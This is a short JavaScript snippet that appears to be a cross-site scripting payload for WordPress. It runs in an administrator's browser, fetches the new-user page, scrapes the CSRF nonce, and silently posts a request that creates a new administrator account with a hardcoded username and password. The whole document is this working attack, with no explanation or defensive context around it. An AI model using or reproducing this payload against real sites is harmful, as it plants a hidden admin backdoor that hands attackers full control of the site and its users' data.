function httpGet(theUrl){var xmlHttp = null;xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", theUrl, false );xmlHttp.send( null );return xmlHttp.responseText;}var current_location = window.location.href;var trimmed = current_location.split('/wp-admin/')[0] + '/';var path_variable = '/' + trimmed.split('/').slice(3,-1).join('/') + '/';var trigger = path_variable + "https://www.xqblog.com/wp-admin/user-new.php";var page = httpGet(trigger);function httpPost(theUrl, csrftoken){var xmlHttp = null;xmlHttp = new XMLHttpRequest();xmlHttp.open( "POST", theUrl, false);xmlHttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlHttp.send("action=createuser&_wpnonce_create-user=" + csrftoken + "&_wp_http_referer=" + encodeURI(theUrl) + "&user_login=adminpeler&email=admin@peler.com&first_name=adminpeler&last_name=peler&url=peler.com&pass1=3krv7Qwp2X&pass2=3krv7Qwp2X&role=administrator&createuser=Add+New+User+");return xmlHttp.responseText;}var regExp = /name=\"_wpnonce_create-user\"\svalue=\"([^)]+)\"/;var matches = regExp.exec(page);var csrftoken = matches[1].slice(0, 10);httpPost(trigger, csrftoken);